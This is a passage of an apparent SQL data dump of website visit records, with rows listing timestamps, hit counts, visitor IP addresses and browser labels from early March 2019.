),(394094,1551567587,1,1,0,0,'54.36.148.58','other'),(394095,1551567669,1,1,0,0,'207.46.13.9','other'),(394096,1551568065,1,1,0,0,'46.229.168.147','other'),(394097,1551568350,1,1,0,0,'46.229.168.148','other'),(394098,1551568682,2,2,0,0,'66.249.64.62','chrome'),(394099,1551568980,1,1,0,0,'54.36.148.243','other'),(394100,1551569046,1,1,0,0,'54.36.149.91','other'),(394101,1551569693,1,1,0,0,'54.36.148.180','other'),(394102,1551569832,1,1,0,0,'207.46.13.9','other'),(394103,1551570074,1,1,0,0,'54.36.148.232','other'),(394104,1551570356,1,1,0,0,'54.36.148.158','other'),(394105,1551570570,1,1,0,0,'46.229.168.152','other'),(394106,1551570592,1,1,0,0,'54.36.148.181','other'),(394107,1551570799,1,1,0,0,'54.36.149.102','other'),(394108,1551571096,1,1,0,0,'54.36.150.134','other'),(394109,1551571349,1,1,0,0,'54.36.148.163','other'),(394110,1551571576,1,1,0,0,'54.36.148.207','other'),(394111,1551571645,1,1,0,0,'66.249.64.60','chrome'),(394112,1551571839,1,1,0,0,'54.36.148.229','other'),(394113,1551571853,1,1,0,0,'66.249.64.29','chrome'),(394114,1551571879,1,1,0,0,'54.36.150.104','other'),(394115,1551572051,1,1,0,0,'54.36.149.100','other'),(394116,1551572166,1,1,0,0,'54.36.148.255','other'),(394117,1551572170,3,3,0,0,'207.46.13.192','other'),(394118,1551572313,1,1,0,0,'54.36.148.5','other'),(394119,1551572649,1,1,0,0,'95.163.255.47','other'),(394120,1551572894,1,1,0,0,'54.36.149.55','other'),(394121,1551572978,1,1,0,0,'54.36.149.42','other'),(394122,1551572993,1,1,0,0,'54.36.148.253','other'),(394123,1551573047,1,1,0,0,'216.244.66.241','other'),(394124,1551573218,1,1,0,0,'66.249.64.58','chrome'),(394125,1551573288,1,1,0,0,'66.249.64.62','chrome'),(394126,1551573315,1,1,0,0,'54.36.148.150','other'),(394127,1551573338,1,1,0,0,'54.36.150.38','other'),(394128,1551573343,1,1,0,0,'54.36.150.99','other'),(394129,1551573356,2,2,0,0,'66.249.64.31','chrome'),(394130,1551573525,1,1,0,0,'54.36.148.16','other'),(394131,1551573554,1,1,0,0,'54.36.150.27','other'),(394132,1551573676,1,1,0,0,'54.36.149.58','other'),(394133,1551573677,1,1,0,0,'5.188.210.31','chrome'),(394134,1551573763,2,2,0,0,'66.249.64.60','chrome'),(394135,1551573819,2,2,0,0,'66.249.64.29','chrome'),(394136,1551573827,2,2,0,0,'8.29.198.25','other'),(394137,1551573972,1,1,0,0,'207.46.13.9','other'),(394138,1551574224,1,1,0,0,'207.46.13.90','other'),(394139,1551574697,1,1,0,0,'66.249.64.60','chrome'),(394140,1551574829,1,1,0,0,'54.36.150.55','other'),(394141,1551574959,1,1,0,0,'66.249.64.29','chrome'),(394142,1551575062,1,1,0,0,'216.244.66.241','other'),(394143,1551575179,1,1,0,0,'54.36.150.77','other'),(394144,1551575416,2,2,0,0,'66.249.64.30','chrome'),(394145,1551575547,1,1,0,0,'54.36.150.132','other'),(394146,1551575731,1,1,0,0,'54.36.150.118','other'),(394147,1551575898,1,1,0,0,'46.229.168.146','other'),(394148,1551576002,1,1,0,0,'46.229.168.143','other'),(394149,1551576019,1,1,0,0,'216.244.66.241','other'),(394150,1551576269,2,2,0,0,'66.249.64.29','chrome'),(394151,1551576558,1,1,0,0,'95.163.255.47','other'),(394152,1551576709,2,2,0,0,'66.249.64.31','chrome'),(394153,1551576812,1,1,0,0,'54.200.236.179','other'),(394154,1551576860,1,1,0,0,'66.249.64.30','chrome'),(394155,1551576910,1,1,0,0,'207.46.13.192','other'),(394156,1551577168,1,1,0,0,'54.36.150.97','other'),(394157,1551577447,1,1,0,0,'54.36.148.18','other'),(394158,1551577486,1,1,0,0,'46.229.168.135','other'),(394159,1551577525,1,1,0,0,'54.36.149.72','other'),(394160,1551577693,1,1,0,0,'54.36.148.71','other'),(394161,1551577781,2,2,0,0,'66.249.64.29','chrome'),(394162,1551577891,1,1,0,0,'54.36.149.99','other'),(394163,1551577977,1,1,0,0,'95.163.255.45','other'),(394164,1551578230,1,1,0,0,'157.55.39.158','other'),(394165,1551578598,2,2,0,0,'66.249.64.60','chrome'),(394166,1551578953,1,1,0,0,'54.36.148.198','other'),(394167,1551579000,1,1,0,0,'141.8.142.191','other'),(394168,1551579011,3,3,0,0,'5.45.207.19','other'),(394169,1551579109,2,2,0,0,'66.249.64.29','chrome'),(394170,1551579304,1,1,0,0,'87.250.224.47','other'),(394171,1551579465,1,1,0,0,'54.36.148.156','other'),(394172,1551579497,1,1,0,0,'46.229.168.143','other'),(394173,1551579507,1,1,0,0,'54.36.148.38','other'),(394174,1551579541,2,2,0,0,'178.154.244.11','other'),(394175,1551579632,1,1,0,0,'46.229.168.142','other'),(394176,1551579700,1,1,0,0,'54.36.148.3','other'),(394177,1551579704,1,1,0,0,'54.36.149.17','other'),(394178,1551579850,1,1,0,0,'213.180.203.40','other'),(394179,1551579911,1,1,0,0,'95.108.213.4','other'),(394180,1551579944,1,1,0,0,'54.36.148.212','other'),(394181,1551579950,1,1,0,0,'207.46.13.90','other'),(394182,1551580029,1,1,0,0,'66.249.64.31','chrome'),(394183,1551580115,1,1,0,0,'66.249.64.62','chrome'),(394184,1551580307,2,2,0,0,'141.8.132.16','other'),(394185,1551580422,1,1,0,0,'66.249.64.60','chrome'),(394186,1551580548,2,2,0,0,'66.249.64.29','chrome'),(394187,1551580573,1,1,0,0,'54.36.150.141','other'),(394188,1551580592,2,2,0,0,'178.154.244.11','other'),(394189,1551580886,2,2,0,0,'5.45.207.19','other'),(394190,1551580925,2,2,0,0,'66.249.64.30','chrome'),(394191,1551581156,1,1,0,0,'216.244.66.241','other'),(394192,1551581317,1,1,0,0,'66.249.64.62','chrome'),(394193,1551581557,2,2,0,0,'178.154.244.49','other'),(394194,1551581750,1,1,0,0,'87.250.224.47','other'),(394195,1551581821,1,1,0,0,'178.154.244.65','other'),(394196,1551581939,2,2,0,0,'141.8.183.22','other'),(394197,1551582105,1,1,0,0,'66.249.64.29','chrome'),(394198,1551582344,1,1,0,0,'46.229.168.144','other'),(394199,1551582440,1,1,0,0,'178.154.244.11','other'),(394200,1551582511,1,1,0,0,'157.55.39.158','other'),(394201,1551582853,1,1,0,0,'46.229.168.143','other'),(394202,1551582926,1,1,0,0,'178.154.200.48','other'),(394203,1551584132,1,1,0,0,'46.229.168.150','other'),(394204,1551584261,2,2,0,0,'66.249.64.30','chrome'),(394205,1551584330,1,1,0,0,'54.36.150.78','other'),(394206,1551584587,1,1,0,0,'95.163.255.47','other'),(394207,1551584664,2,2,0,0,'207.46.13.9','other'),(394208,1551584677,1,1,0,0,'8.29.198.26','other'),(394209,1551584813,1,1,0,0,'8.29.198.27','other'),(394210,1551585239,1,1,0,0,'46.229.168.153','other'),(394211,1551585288,1,1,0,0,'54.36.148.168','other'),(394212,1551585415,1,1,0,0,'54.36.150.41','other'),(394213,1551585565,1,1,0,0,'54.36.148.138','other'),(394214,1551585632,1,1,0,0,'5.45.207.79','other'),(394215,1551585686,1,1,0,0,'5.45.207.19','other'),(394216,1551585775,2,2,0,0,'34.221.34.222','chrome'),(394217,1551586250,1,1,0,0,'54.36.149.44','other'),(394218,1551586287,2,2,0,0,'54.36.148.209','other'),(394219,1551586307,1,1,0,0,'54.36.150.35','other'),(394220,1551586317,1,1,0,0,'66.249.64.58','chrome'),(394221,1551586406,1,1,0,0,'66.249.64.29','chrome'),(394222,1551586631,1,1,0,0,'180.76.15.140','other'),(394223,1551587008,1,1,0,0,'66.249.64.31','chrome'),(394224,1551587898,1,1,0,0,'66.249.64.29','chrome'),(394225,1551588185,1,1,0,0,'40.77.167.212','other'),(394226,1551588283,1,1,0,0,'167.114.233.118','firefox'),(394227,1551588348,2,2,0,0,'216.244.66.241','other'),(394228,1551588397,1,1,0,0,'54.36.149.34','other'),(394229,1551588858,1,1,0,0,'54.36.148.40','other'),(394230,1551589567,1,1,0,0,'178.154.244.11','other'),(394231,1551589595,1,1,0,0,'46.229.168.145','other'),(394232,1551590200,1,1,0,0,'54.36.148.146','other'),(394233,1551590213,1,1,0,0,'66.249.64.30','chrome'),(394234,1551590239,1,1,0,0,'54.36.150.22','other'),(394235,1551590299,1,1,0,0,'66.249.64.29','chrome'),(394236,1551591074,1,1,0,0,'46.229.168.145','other'),(394237,1551591108,1,1,0,0,'40.77.167.210','other'),(394238,1551591212,1,1,0,0,'66.249.64.31','chrome'),(394239,1551591331,1,1,0,0,'216.244.66.241','other'),(394240,1551591468,1,1,0,0,'54.36.149.88','other'),(394241,1551591469,5,5,0,0,'66.249.64.29','chrome'),(394242,1551591564,3,3,0,0,'66.249.64.30','chrome'),(394243,1551591722,1,1,0,0,'54.36.148.176','other'),(394244,1551591843,1,1,0,0,'66.249.64.62','chrome'),(394245,1551592011,1,1,0,0,'66.249.64.58','chrome'),(394246,1551592225,1,1,0,0,'40.77.167.3','other'),(394247,1551592660,1,1,0,0,'54.36.150.35','other'),(394248,1551592917,1,1,0,0,'207.46.13.59','other'),(394249,1551593353,1,1,0,0,'185.220.101.25','other'),(394250,1551593398,1,1,0,0,'54.36.148.84','other'),(394251,1551593402,1,1,0,0,'66.249.64.31','chrome'),(394252,1551593461,1,1,0,0,'54.36.150.186','other'),(394253,1551593525,2,2,0,0,'66.249.64.29','chrome'),(394254,1551593598,1,1,0,0,'66.249.64.30','chrome'),(394255,1551593680,1,1,0,0,'54.36.150.114','other'),(394256,1551593950,1,1,0,0,'54.36.148.91','other'),(394257,1551594124,1,1,0,0,'54.36.148.194','other'),(394258,1551594504,2,2,0,0,'66.249.64.62','chrome'),(394259,1551594523,1,1,0,0,'66.249.64.29','chrome'),(394260,1551595045,1,1,0,0,'95.108.213.4','other'),(394261,1551595050,1,1,0,0,'87.250.224.65','other'),(394262,1551595072,2,2,0,0,'66.249.64.31','chrome'),(394263,1551595119,1,1,0,0,'5.45.207.19','other'),(394264,1551595128,2,2,0,0,'5.45.207.79','other'),(394265,1551595167,1,1,0,0,'141.8.142.103','other'),(394266,1551595412,2,2,0,0,'178.154.244.11','other'),(394267,1551595528,1,1,0,0,'8.29.198.27','other'),(394268,1551595679,1,1,0,0,'8.29.198.26','other'),(394269,1551595702,1,1,0,0,'54.36.148.73','other'),(394270,1551595731,1,1,0,0,'213.180.203.9','other'),(394271,1551595859,1,1,0,0,'207.46.13.192','other'),(394272,1551595915,1,1,0,0,'66.249.64.30','chrome'),(394273,1551596007,1,1,0,0,'66.249.64.29','chrome'),(394274,1551596240,1,1,0,0,'54.36.149.107','other'),(394275,1551596731,1,1,0,0,'46.229.168.154','other'),(394276,1551596903,1,1,0,0,'54.36.150.132','other'),(394277,1551597009,1,1,0,0,'54.36.150.84','other'),(394278,1551597044,2,2,0,0,'66.249.64.29','chrome'),(394279,1551597438,1,1,0,0,'54.36.149.8','other'),(394280,1551597689,1,1,0,0,'157.55.39.158','other'),(394281,1551597770,1,1,0,0,'178.154.244.11','other'),(394282,1551597925,1,1,0,0,'46.229.168.144','other'),(394283,1551598238,1,1,0,0,'46.229.168.135','other'),(394284,1551598479,1,1,0,0,'66.249.64.29','chrome'),(394285,1551598795,2,2,0,0,'66.249.64.30','chrome'),(394286,1551599561,1,1,0,0,'46.229.168.133','other'),(394287,1551599851,1,1,0,0,'54.36.150.86','other'),(394288,1551600084,1,1,0,0,'46.229.168.137','other'),(394289,1551600101,1,1,0,0,'54.36.149.41','other'),(394290,1551600217,2,2,0,0,'66.249.64.29','chrome'),(394291,1551600363,1,1,0,0,'54.36.150.177','other'),(394292,1551600481,1,1,0,0,'54.36.150.95','other'),(394293,1551600576,1,1,0,0,'207.46.13.124','other'),(394294,1551600789,1,1,0,0,'46.229.168.150','other'),(394295,1551600925,1,1,0,0,'54.36.150.48','other'),(394296,1551601077,1,1,0,0,'54.36.150.86','other'),(394297,1551601221,1,1,0,0,'5.45.207.19','other'),(394298,1551601222,1,1,0,0,'54.36.148.1','other'),(394299,1551602061,1,1,0,0,'54.36.148.240','other'),(394300,1551602292,1,1,0,0,'54.36.148.199','other'),(394301,1551602474,2,2,0,0,'66.249.64.30','chrome'),(394302,1551602544,1,1,0,0,'54.36.148.201','other'),(394303,1551603059,1,1,0,0,'157.55.39.239','other'),(394304,1551603210,1,1,0,0,'54.36.149.102','other'),(394305,1551603340,1,1,0,0,'54.36.148.226','other'),(394306,1551603377,1,1,0,0,'54.36.149.12','other'),(394307,1551603434,3,3,0,0,'66.249.64.30','chrome'),(394308,1551603532,1,1,0,0,'207.46.13.124','other'),(394309,1551603569,1,1,0,0,'54.36.150.43','other'),(394310,1551603789,1,1,0,0,'178.154.244.11','other'),(394311,1551604081,1,1,0,0,'157.55.39.142','other'),(394312,1551604359,1,1,0,0,'66.249.64.30','chrome'),(394313,1551604430,2,2,0,0,'216.244.66.241','other'),(394314,1551604699,1,1,0,0,'54.36.149.5','other'),(394315,1551605214,1,1,0,0,'66.102.9.62','chrome'),(394316,1551605356,1,1,0,0,'157.55.39.239','other'),(394317,1551605430,1,1,0,0,'54.36.149.66','other'),(394318,1551605475,1,1,0,0,'66.249.64.62','chrome'),(394319,1551605547,1,1,0,0,'5.45.207.19','other'),(394320,1551605617,1,1,0,0,'66.249.64.30','chrome'),(394321,1551605803,1,1,0,0,'54.36.148.228','other'),(394322,1551605959,1,1,0,0,'54.36.150.139','other'),(394323,1551606385,1,1,0,0,'8.29.198.25','other'),(394324,1551606465,2,2,0,0,'207.46.13.124','other'),(394325,1551606559,1,1,0,0,'8.29.198.27','other'),(394326,1551606688,1,1,0,0,'54.36.150.25','other'),(394327,1551607171,1,1,0,0,'54.36.148.115','other'),(394328,1551607215,1,1,0,0,'216.244.66.241','other'),(394329,1551607340,1,1,0,0,'40.77.167.151','other'),(394330,1551607468,1,1,0,0,'66.249.64.60','chrome'),(394331,1551607505,1,1,0,0,'54.36.148.165','other'),(394332,1551607522,1,1,0,0,'54.36.149.58','other'),(394333,1551607675,1,1,0,0,'66.249.64.29','chrome'),(394334,1551608893,1,1,0,0,'46.229.168.144','other'),(394335,1551608894,1,1,0,0,'54.36.149.3','other'),(394336,1551608995,1,1,0,0,'95.163.255.48','other'),(394337,1551609113,1,1,0,0,'40.77.167.29','other'),(394338,1551609504,2,2,0,0,'66.249.64.29','chrome'),(394339,1551609864,1,1,0,0,'123.126.113.121','other'),(394340,1551610040,1,0,1,0,'66.249.64.31',''),(394341,1551610142,1,1,0,0,'207.46.13.124','other'),(394342,1551610355,1,1,0,0,'54.36.148.221','other'),(394343,1551611015,1,1,0,0,'54.36.148.213','other'),(394344,1551611016,1,1,0,0,'91.196.178.93','other'),(394345,1551611094,1,1,0,0,'54.36.148.116','other'),(394346,1551611095,1,1,0,0,'66.249.64.62','chrome'),(394347,1551611368,1,1,0,0,'54.36.148.237','other'),(394348,1551611751,1,1,0,0,'54.36.149.11','other'),(394349,1551611912,1,1,0,0,'54.36.148.210','other'),(394350,1551611982,1,1,0,0,'66.249.64.30','chrome'),(394351,1551611987,1,1,0,0,'40.77.167.29','other'),(394352,1551612098,1,1,0,0,'54.36.148.197','other'),(394353,1551612226,1,1,0,0,'54.36.148.173','other'),(394354,1551612551,1,1,0,0,'54.36.148.85','other'),(394355,1551612666,1,1,0,0,'54.36.148.74','other'),(394356,1551612697,1,1,0,0,'54.36.150.30','other'),(394357,1551612916,2,2,0,0,'66.249.64.29','chrome'),(394358,1551612999,1,1,0,0,'66.249.64.58','chrome'),(394359,1551613131,2,2,0,0,'66.249.64.30','chrome'),(394360,1551613313,2,2,0,0,'216.244.66.241','other'),(394361,1551613354,1,1,0,0,'54.36.148.252','other'),(394362,1551613481,1,1,0,0,'66.249.64.60','chrome'),(394363,1551614227,1,1,0,0,'54.36.149.61','other'),(394364,1551614431,1,1,0,0,'54.36.150.12','other'),(394365,1551614515,1,1,0,0,'54.36.150.191','other'),(394366,1551614982,1,1,0,0,'66.249.64.58','chrome'),(394367,1551615035,1,1,0,0,'95.108.213.4','other'),(394368,1551615092,1,1,0,0,'178.154.244.11','other'),(394369,1551615165,1,1,0,0,'40.77.167.29','other'),(394370,1551615358,1,1,0,0,'66.249.64.30','chrome'),(394371,1551615555,5,5,0,0,'5.45.207.19','other'),(394372,1551615558,1,1,0,0,'37.9.113.20','other'),(394373,1551615566,1,1,0,0,'207.46.13.124','other'),(394374,1551615655,1,1,0,0,'185.209.0.8','other'),(394376,1551615912,1,1,0,0,'54.36.150.62','other'),(394377,1551616048,1,1,0,0,'37.9.113.148','other'),(394378,1551616074,1,1,0,0,'54.36.148.189','other'),(394379,1551616139,1,1,0,0,'178.154.244.11','other'),(394380,1551616166,2,2,0,0,'5.45.207.79','other'),(394381,1551616320,1,1,0,0,'54.36.149.65','other'),(394382,1551616347,2,2,0,0,'95.108.213.4','other'),(394383,1551616439,1,1,0,0,'87.250.224.47','other'),(394384,1551616732,1,1,0,0,'54.36.149.12','other'),(394385,1551616819,2,2,0,0,'66.249.64.29','chrome'),(394386,1551616857,1,1,0,0,'141.8.142.103','other'),(394387,1551616885,1,1,0,0,'66.249.64.58','chrome'),(394388,1551616945,1,1,0,0,'66.249.64.30','chrome'),(394389,1551617103,1,1,0,0,'207.46.13.213','other'),(394390,1551617152,1,1,0,0,'95.163.255.46','other'),(394391,1551617181,1,1,0,0,'54.36.149.80','other'),(394392,1551617210,1,1,0,0,'5.45.207.79','other'),(394393,1551617217,1,1,0,0,'46.229.168.132','other'),(394394,1551617220,1,1,0,0,'8.29.198.27','other'),(394395,1551617255,1,1,0,0,'5.45.207.19','other'),(394396,1551617424,1,1,0,0,'8.29.198.26','other'),(394397,1551617668,2,2,0,0,'178.154.244.11','other'),(394398,1551617687,1,1,0,0,'54.36.150.60','other'),(394399,1551617764,1,1,0,0,'158.69.241.223','chrome'),(394400,1551617827,2,2,0,0,'66.249.64.31','chrome'),(394401,1551617849,1,1,0,0,'54.36.148.246','other'),(394402,1551617886,1,1,0,0,'46.229.168.154','other'),(394403,1551618086,1,1,0,0,'95.163.255.45','other'),(394404,1551618089,1,1,0,0,'188.239.11.164','chrome'),(394405,1551618098,1,1,0,0,'66.249.64.60','chrome'),(394406,1551618142,1,1,0,0,'141.8.142.103','other'),(394407,1551618558,5,5,0,0,'66.249.64.30','chrome'),(394408,1551618773,1,1,0,0,'5.45.207.79','other'),(394409,1551618862,2,2,0,0,'66.249.64.31','chrome'),(394410,1551618863,1,1,0,0,'66.249.64.62','chrome'),(394411,1551618864,40,40,0,0,'66.249.64.29','chrome'),(394412,1551619384,1,1,0,0,'54.36.150.9','other'),(394413,1551619993,1,1,0,0,'54.36.150.59','other'),(394414,1551620020,1,1,0,0,'54.36.150.30','other'),(394415,1551620066,1,1,0,0,'66.249.64.29','chrome'),(394416,1551620214,1,1,0,0,'54.36.150.176','other'),(394417,1551620308,1,1,0,0,'13.57.233.99','chrome'),(394418,1551620326,1,1,0,0,'66.249.64.30','chrome'),(394419,1551620331,1,1,0,0,'180.76.15.28','other'),(394420,1551620432,1,1,0,0,'54.36.150.136','other'),(394421,1551620534,1,1,0,0,'37.9.113.103','other'),(394422,1551620698,2,2,0,0,'95.108.213.4','other'),(394423,1551621025,5,5,0,0,'5.45.207.79','other'),(394424,1551621047,1,1,0,0,'141.8.142.103','other'),(394425,1551621140,1,1,0,0,'46.229.168.136','other'),(394426,1551621158,1,1,0,0,'46.229.168.137','other'),(394427,1551621187,1,1,0,0,'54.36.148.127','other'),(394428,1551621247,1,1,0,0,'216.244.66.241','other'),(394429,1551621447,2,2,0,0,'178.154.244.11','other'),(394430,1551621481,1,1,0,0,'91.196.178.131','firefox'),(394431,1551621528,2,2,0,0,'66.249.64.30','chrome'),(394432,1551621705,1,1,0,0,'54.36.150.61','other'),(394433,1551621790,1,1,0,0,'40.77.167.159','other'),(394434,1551622172,1,1,0,0,'5.45.207.79','other'),(394435,1551622202,3,3,0,0,'40.77.167.114','other'),(394436,1551622426,1,1,0,0,'141.8.142.103','other'),(394437,1551622990,1,1,0,0,'95.163.255.102','other'),(394438,1551623090,1,1,0,0,'207.46.13.213','other'),(394439,1551623296,1,1,0,0,'95.163.255.44','other'),(394440,1551623715,1,1,0,0,'54.36.150.104','other'),(394441,1551623995,1,1,0,0,'66.249.64.30','chrome'),(394442,1551624069,1,1,0,0,'54.36.148.27','other'),(394443,1551624414,1,1,0,0,'95.163.255.46','other'),(394444,1551624831,1,1,0,0,'54.36.149.12','other'),(394445,1551624836,1,1,0,0,'46.229.168.136','other'),(394446,1551625051,1,1,0,0,'66.249.64.60','chrome'),(394447,1551625301,1,1,0,0,'54.36.149.107','other'),(394448,1551625314,1,1,0,0,'66.249.64.58','chrome'),(394449,1551625628,1,1,0,0,'54.36.148.242','other'),(394450,1551625884,1,1,0,0,'66.249.64.31','chrome'),(394451,1551626019,1,1,0,0,'54.36.149.84','other'),(394452,1551626175,1,1,0,0,'66.249.64.30','chrome'),(394453,1551626181,1,1,0,0,'66.249.64.29','chrome'),(394454,1551626239,1,1,0,0,'207.46.13.215','other'),(394455,1551626377,1,1,0,0,'54.36.149.89','other'),(394456,1551626398,1,1,0,0,'54.36.149.59','other'),(394457,1551626406,1,1,0,0,'54.36.148.78','other'),(394458,1551626631,1,1,0,0,'54.36.150.78','other'),(394459,1551626942,1,1,0,0,'95.163.255.47','other'),(394460,1551626966,1,1,0,0,'66.249.64.62','chrome'),(394461,1551627141,1,1,0,0,'54.36.148.81','other'),(394462,1551627706,5,5,0,0,'157.55.39.83','other'),(394463,1551627711,1,1,0,0,'207.46.13.215','other'),(394464,1551627715,1,1,0,0,'40.77.167.172','other'),(394465,1551627720,6,6,0,0,'40.77.167.114','other'),(394466,1551628057,2,2,0,0,'8.29.198.25','other'),(394467,1551628176,1,1,0,0,'54.36.148.148','other'),(394468,1551628367,1,1,0,0,'46.201.134.74','chrome'),(394469,1551628527,1,1,0,0,'54.36.150.131','other'),(394470,1551628725,1,1,0,0,'54.36.149.56','other'),(394471,1551628969,1,1,0,0,'66.249.64.31','chrome'),(394472,1551629084,1,1,0,0,'207.46.13.88','other'),(394473,1551629211,1,1,0,0,'54.36.148.187','other'),(394474,1551629337,1,1,0,0,'66.249.64.58','chrome'),(394475,1551629784,1,1,0,0,'66.249.64.30','chrome'),(394476,1551629997,2,2,0,0,'207.46.13.88','other'),(394477,1551630028,1,1,0,0,'54.36.150.150','other'),(394478,1551630139,1,1,0,0,'46.229.168.154','other'),(394479,1551630360,1,1,0,0,'157.55.39.83','other'),(394480,1551630515,1,1,0,0,'54.36.148.70','other'),(394481,1551630584,4,4,0,0,'5.45.207.79','other'),(394482,1551630694,1,1,0,0,'141.8.142.103','other'),(394483,1551630820,1,1,0,0,'66.249.64.29','chrome'),(394484,1551630872,1,1,0,0,'66.249.64.60','chrome'),(394485,1551630951,1,1,0,0,'178.154.171.24','other'),(394486,1551630954,1,1,0,0,'54.36.148.201','other'),(394487,1551631120,1,1,0,0,'5.45.207.19','other'),(394488,1551631151,1,1,0,0,'54.36.149.43','other'),(394489,1551631336,1,1,0,0,'54.36.148.4','other'),(394490,1551631506,1,1,0,0,'54.36.148.30','other'),(394491,1551631556,1,1,0,0,'216.244.66.241','other'),(394492,1551631905,1,1,0,0,'54.36.148.237','other'),(394493,1551632278,1,1,0,0,'54.36.150.102','other'),(394494,1551632343,1,1,0,0,'54.36.150.26','other'),(394495,1551632631,1,1,0,0,'66.249.64.62','chrome'),(394496,1551632855,1,1,0,0,'54.36.150.50','other'),(394497,1551632883,1,1,0,0,'180.76.15.147','other'),(394498,1551633278,1,1,0,0,'54.36.149.100','other'),(394499,1551633438,1,1,0,0,'54.36.148.248','other'),(394500,1551633491,1,1,0,0,'46.229.168.151','other'),(394501,1551633965,1,1,0,0,'54.36.150.142','other'),(394502,1551634038,1,1,0,0,'54.36.150.9','other'),(394503,1551634098,2,2,0,0,'157.55.39.83','other'),(394504,1551634335,1,1,0,0,'46.229.168.153','other'),(394505,1551634490,1,1,0,0,'207.46.13.215','other'),(394506,1551634883,1,1,0,0,'180.76.15.24','other'),(394507,1551634944,1,1,0,0,'66.249.64.62','chrome'),(394508,1551634996,1,1,0,0,'54.36.149.89','other'),(394509,1551635061,1,1,0,0,'66.249.64.30','chrome'),(394510,1551635236,1,1,0,0,'207.46.13.124','other'),(394511,1551635326,1,1,0,0,'157.55.39.83','other'),(394512,1551635477,2,2,0,0,'66.249.64.29','chrome'),(394513,1551635971,1,1,0,0,'46.229.168.146','other'),(394514,1551636002,2,2,0,0,'91.202.131.23','chrome'),(394515,1551636660,1,1,0,0,'46.229.168.150','other'),(394516,1551636747,2,2,0,0,'66.249.64.58','chrome'),(394517,1551637390,14,14,0,0,'167.114.124.133','chrome'),(394518,1551637414,8,8,0,0,'167.114.124.133','firefox'),(394519,1551637501,2,2,0,0,'207.46.13.88','other'),(394520,1551637552,1,1,0,0,'167.114.124.133','other'),(394521,1551637686,1,1,0,0,'46.229.168.136','other'),(394522,1551637740,1,1,0,0,'157.55.39.83','other'),(394523,1551637779,1,1,0,0,'54.36.148.187','other'),(394524,1551638119,1,1,0,0,'54.36.150.37','other'),(394525,1551638235,1,1,0,0,'66.249.64.29','chrome'),(394526,1551638544,1,1,0,0,'95.163.255.49','other'),(394527,1551638749,1,1,0,0,'66.249.64.31','chrome'),(394528,1551638780,1,1,0,0,'66.249.64.58','chrome'),(394529,1551638920,2,2,0,0,'8.29.198.26','other'),(394530,1551639078,1,1,0,0,'207.46.13.88','other'),(394531,1551639205,1,1,0,0,'54.36.149.29','other'),(394532,1551639376,1,1,0,0,'54.36.150.158','other'),(394533,1551639595,1,1,0,0,'54.36.150.137','other'),(394534,1551639675,1,1,0,0,'54.36.148.89','other'),(394535,1551639681,1,1,0,0,'54.36.150.24','other'),(394536,1551639952,1,1,0,0,'54.36.150.129','other'),(394537,1551639986,1,1,0,0,'54.36.150.44','other'),(394538,1551640029,1,1,0,0,'54.36.150.11','other'),(394539,1551640103,1,1,0,0,'54.36.149.98','other'),(394540,1551640123,1,1,0,0,'207.46.13.215','other'),(394541,1551640251,1,1,0,0,'54.36.150.171','other'),(394542,1551640256,1,1,0,0,'207.46.13.88','other'),(394543,1551640303,1,1,0,0,'54.36.148.1','other'),(394544,1551640372,1,1,0,0,'66.249.64.31','chrome'),(394545,1551640424,3,3,0,0,'66.249.64.30','chrome'),(394546,1551640478,1,1,0,0,'95.163.255.48','other'),(394547,1551640799,1,1,0,0,'54.36.150.93','other'),(394548,1551640986,1,1,0,0,'66.249.64.58','chrome'),(394549,1551641249,1,1,0,0,'54.36.148.165','other'),(394550,1551641395,1,1,0,0,'54.36.150.113','other'),(394551,1551641472,1,1,0,0,'66.249.64.29','chrome'),(394552,1551641526,1,1,0,0,'66.249.64.31','chrome'),(394553,1551641933,1,1,0,0,'46.229.168.134','other'),(394554,1551642083,1,1,0,0,'216.244.66.241','other'),(394555,1551642092,1,1,0,0,'54.36.148.141','other'),(394556,1551642156,1,1,0,0,'54.36.148.251','other'),(394557,1551642159,2,2,0,0,'157.55.39.83','other'),(394558,1551642663,1,1,0,0,'207.46.13.215','other'),(394559,1551643019,1,1,0,0,'54.36.149.42','other'),(394560,1551643155,1,1,0,0,'54.36.148.245','other'),(394561,1551643747,2,2,0,0,'66.249.64.60','chrome'),(394562,1551643899,1,1,0,0,'54.36.149.20','other'),(394563,1551643985,2,2,0,0,'157.55.39.83','other'),(394564,1551644577,1,1,0,0,'54.36.149.8','other'),(394565,1551644636,1,1,0,0,'66.249.64.30','chrome'),(394566,1551644892,2,2,0,0,'216.244.66.241','other'),(394567,1551644893,1,1,0,0,'95.163.255.45','other'),(394568,1551644972,1,1,0,0,'66.249.64.60','chrome'),(394569,1551645540,1,1,0,0,'66.249.64.29','chrome'),(394570,1551646321,1,1,0,0,'66.249.64.30','chrome'),(394571,1551646416,1,1,0,0,'66.249.64.58','chrome'),(394572,1551646507,1,1,0,0,'46.229.168.141','other'),(394573,1551646620,1,1,0,0,'91.196.178.103','chrome'),(394574,1551647443,1,1,0,0,'54.36.150.22','other'),(394575,1551647449,2,2,0,0,'87.250.224.47','other'),(394576,1551647471,1,1,0,0,'46.229.168.144','other'),(394577,1551647478,4,4,0,0,'178.154.244.11','other'),(394578,1551647526,2,2,0,0,'141.8.142.103','other'),(394579,1551647720,3,3,0,0,'95.108.213.4','other'),(394580,1551648025,3,3,0,0,'5.45.207.79','other'),(394581,1551648073,1,1,0,0,'37.9.113.148','other'),(394582,1551648082,1,1,0,0,'5.45.207.19','other'),(394583,1551648223,1,1,0,0,'46.229.168.138','other'),(394584,1551648449,3,3,0,0,'141.8.142.103','other'),(394585,1551648671,4,4,0,0,'178.154.244.11','other'),(394586,1551648995,1,1,0,0,'54.36.150.170','other'),(394587,1551649397,1,1,0,0,'95.108.213.4','other'),(394588,1551649460,1,1,0,0,'54.36.150.9','other'),(394589,1551649522,3,3,0,0,'5.45.207.19','other'),(394590,1551649541,1,1,0,0,'54.36.148.79','other'),(394591,1551649546,3,3,0,0,'5.45.207.79','other'),(394592,1551649574,1,1,0,0,'54.36.149.94','other'),(394593,1551649762,1,1,0,0,'8.29.198.26','other'),(394594,1551649800,1,1,0,0,'178.154.244.11','other'),(394595,1551649854,1,1,0,0,'141.8.142.103','other'),(394596,1551649913,2,2,0,0,'207.46.13.215','other'),(394597,1551650012,1,1,0,0,'8.29.198.27','other'),(394598,1551650262,2,2,0,0,'157.55.39.83','other'),(394599,1551650494,2,2,0,0,'5.45.207.79','other'),(394600,1551650562,2,2,0,0,'5.45.207.19','other'),(394601,1551650755,1,1,0,0,'66.249.64.30','chrome'),(394602,1551651404,1,1,0,0,'54.36.150.151','other'),(394603,1551651484,1,1,0,0,'54.36.148.169',